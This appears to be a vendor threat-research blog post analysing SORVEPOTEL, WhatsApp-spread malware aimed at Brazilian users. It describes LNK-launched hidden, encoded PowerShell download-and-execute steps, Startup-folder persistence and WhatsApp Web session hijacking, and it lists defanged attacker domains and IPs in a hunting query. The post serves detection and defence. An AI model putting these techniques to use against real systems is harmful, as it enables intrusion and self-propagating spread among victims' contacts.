Malware
Self-Propagating Malware Spreading Via WhatsApp, Targets Brazilian Users
Trend™ Research has identified an active campaign spreading via WhatsApp through a ZIP file attachment. When executed, the malware establishes persistence and hijacks the compromised WhatsApp account to send copies of itself to the victim’s contacts.
Save to Folio
With contributions from Joe Soares
Key takeaways:
- SORVEPOTEL has been observed to spread across Windows systems with a message that requires users to open it on a desktop, suggesting that threat actors behind the campaign are targeting enterprises.
- The malware leverages active WhatsApp sessions to automatically distribute the same malicious ZIP file to all contacts and groups associated with the victim’s compromised account for rapidly propagation.
- Current evidence suggests that the campaign’s main objective is widespread distribution rather than causing deeper system compromise. However, it should be noted that other Brazilian campaigns using similar techniques to SORVEPOTEL have previously targeted financial data.
Trend™ Research is currently investigating an aggressive malware campaign that leverages online instant messaging platform WhatsApp as its primary infection vector. Unlike traditional attacks focused on theft or ransomware, this campaign is engineered for speed and propagation, abusing social trust and automation to spread among Windows users. Trend Research analysis identifies the campaign as SORVEPOTEL, and as of writing, is most active in Brazil.
SORVEPOTEL has been observed to spread across Windows systems through convincing phishing messages with malicious ZIP file attachments. Interestingly, the phishing message that contains the malicious file attachment requires users to open it on a desktop, suggesting that threat actors might be more interested in targeting enterprises rather than consumers. Once opened, the malware automatically propagates via WhatsApp Web, causing infected accounts to be banned due to excessive spam activity.
According to Trend Research telemetry, early campaign activity suggests a regional focus on Brazil, with 457 of the 477 cases we detected as of writing are from Brazil.
Trend Research telemetry also shows that SORVEPOTEL has impacted government and public service organizations the most, but has also victimized organizations in manufacturing, technology, education, and construction.
Initial Infection Vector
The infection begins when a user receives a phishing message via WhatsApp from a compromised contact, typically an account belonging to a friend or colleague making the message appear legitimate.
The message has a ZIP archive attachment, bearing the name "RES-20250930_112057.zip,” or "ORCAMENTO_114418.zip," or something similarly disguised as a benign document, such as a receipt, budget, or health app-related file. Exploiting trust in WhatsApp conversations, the message, which is in Portuguese, encourages the user to "baixa o zip no PC e abre" (download the ZIP on PC and open it).
Additionally, evidence shows that email is another possible initial infection vector for this campaign. Several phishing emails have been observed distributing ZIP attachments with names like "COMPROVANTE_20251001_094031.zip," "ComprovanteSantander-75319981.682657420.zip," and "NEW-20251001_133944-PED_1273E322.zip." These emails are sent from addresses that appear legitimate, often using subjects such as "Documento de Rafael B," "Zip," or "Extrato" to entice recipients into opening the malicious attachment.
Execution of Malicious LNK File
Upon extracting the ZIP file, the victim discovers a Windows shortcut (.LNK) file. When the LNK file is executed, this shortcut covertly launches a command-line or PowerShell script that downloads the primary malware payload from attacker-controlled domains.
By posing as a benign shortcut, the LNK file can evade basic antivirus detection. Similar activity is observed across various related domains, such as sorvetenopoate[.]com, sorvetenoopote[.]com, etenopote[.]com, expahnsiveuser[.]com, sorv[.]etenopote[.]com, and sorvetenopotel[.]com, all of which serve as API endpoints for the malicious payload delivery.
The decrypted command retrieves a malicious script from a specified URL and executes it in memory using the Invoke-Expression (IEX) function. It runs in hidden mode (-w hidden) to evade user notice and leverages the encoded command (-enc) feature for additional payload obfuscation.
Batch Script Download and Persistence
The payload downloaded by the script is usually a batch file (.BAT), designed to establish persistence on the infected system. This is achieved by copying itself into the Windows Startup folder, ensuring that the malware runs automatically every time the computer boots.
The batch script utilizes several for loops to assemble and run a PowerShell command. This command is executed in a concealed window (-windowstyle hidden), with its parameters provided in Base64 encoded form (-enc) for added obfuscation.
Once decoded, the PowerShell command generates a URL that points to the command-and-control (C&C) server. Using Net.WebClient, the script downloads content from this address, which is then immediately executed in memory via Invoke-Expression. The malware maintains communication with multiple C&C servers, enabling it to receive further instructions or retrieve additional malicious components if required.
WhatsApp Web Session Hijack and Automated Propagation
Trend Research analysis found that a key feature of this malware is its ability to detect whether WhatsApp Web is active on the infected machine.
When detected, the malware leverages this session to automatically distribute the same malicious ZIP file to all contacts and groups associated with the victim’s compromised account, rapidly propagating itself.
This automated spreading results in a high volume of spam messages and frequently leads to account suspensions or bans due to violations of WhatsApp’s terms of service.
Post-Infection Behavior and Evasion
After initial infection, this malware continues to operate primarily as a self-propagating threat, with current evidence suggesting that its main objective is widespread distribution rather than causing deeper system compromise.
As of writing, reported cases show no significant signs of data exfiltration or file encryption. It is worth noting, however, that Brazilian campaigns using similar techniques, such as LNK shortcuts and PowerShell scripts, have previously targeted financial data.
To evade detection and maintain persistence, the malware employs several strategies: it uses obfuscated and typo squatted domains, such as “sorvetenopotel” which closely resembles the innocuous Brazilian phrase “sorvete no pote” (ice cream in a cup). This tactic helps malicious infrastructure blend in with legitimate traffic and avoid immediate scrutiny.
Trend Research also observed potential links to additional infrastructure, including domains such as cliente[.]rte[.]com[.]br, which were used for malware distribution in the days leading up to larger campaign activity. These findings underscore the attackers’ continual efforts to update and diversify their delivery methods for maximum reach and stealth.
Conclusion
The SORVEPOTEL campaign demonstrates how threat actors are increasingly leveraging popular communication platforms like WhatsApp to achieve rapid, large-scale malware propagation with minimal user interaction. By combining convincing tried-and-tested phishing tactics, automated session exploitation, and evasion techniques, SORVEPOTEL is likely to spread fast.
While the current impact centers on widespread infection and account bans rather than encryption, similarities to past Brazilian campaigns underline the potential for future evolution.
Vigilance, user awareness, and effective security controls are essential to mitigating this and similar threats. Trend Micro continues to monitor this campaign closely and recommends maintaining up-to-date defenses while staying informed about emerging attack techniques targeting messaging platforms.
Defense Recommendations
To minimize the risks associated with the SORVEPOTEL campaign, Trend recommends several practical initial defense items:
- Disable Auto-Downloads on WhatsApp. Turn off automatic downloads of media and documents in WhatsApp settings to reduce accidental exposure to malicious files.
- Control File Transfers on Personal Apps. Use endpoint security or firewall policies to block or restrict file transfers through personal applications like WhatsApp, Telegram, or WeTransfer on company-managed devices. If your organization supports BYOD, enforce strict app whitelisting or containerization to protect sensitive environments.
- Enhance User Awareness. The victimology of the SORVEPOTEL campaign suggests that attackers are targeting enterprises. Organizations are recommended to provide regular security training to help employees recognize the dangers of downloading files via messaging platforms. Advise users to avoid clicking on unexpected attachments or suspicious links, even when they come from known contacts, and promote the use of secure, approved channels for transferring business documents.
Implementing these recommendations will help organizations and individuals better defend against malware threats delivered through messaging applications.
Proactive security with Trend Vision One™
Trend Vision One️™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This holistic approach helps enterprises predict and prevent threats, accelerating proactive security outcomes across their respective digital estate. Eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation, especially in the cases of novel malware threats as in the one discussed in this blog.
Trend Vision One ™ Threat Intelligence
To stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights which provides the latest insights from Trend ™ Research on emerging threats and threat actors.
Trend Vision One Threat Insights
- Emerging Threats: WhatsApp Under Siege: Self-Propagating Malware Targets Brazilian Users
Trend Vision One Intelligence Reports (IOC Sweeping)
Hunting Queries
Trend Vision One Search App
Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.
Search for outbound connections to known malicious IP addresses associated with Comprovante WhatsApp
eventId:3 AND eventSubId:204 AND (dst:109.176.30.141 OR dst:165.154.254.44 OR dst:23.227.203.148 OR dst:77.111.101.169)
Indicators of Compromise (IoCs)
Indicators of Compromise can be found here.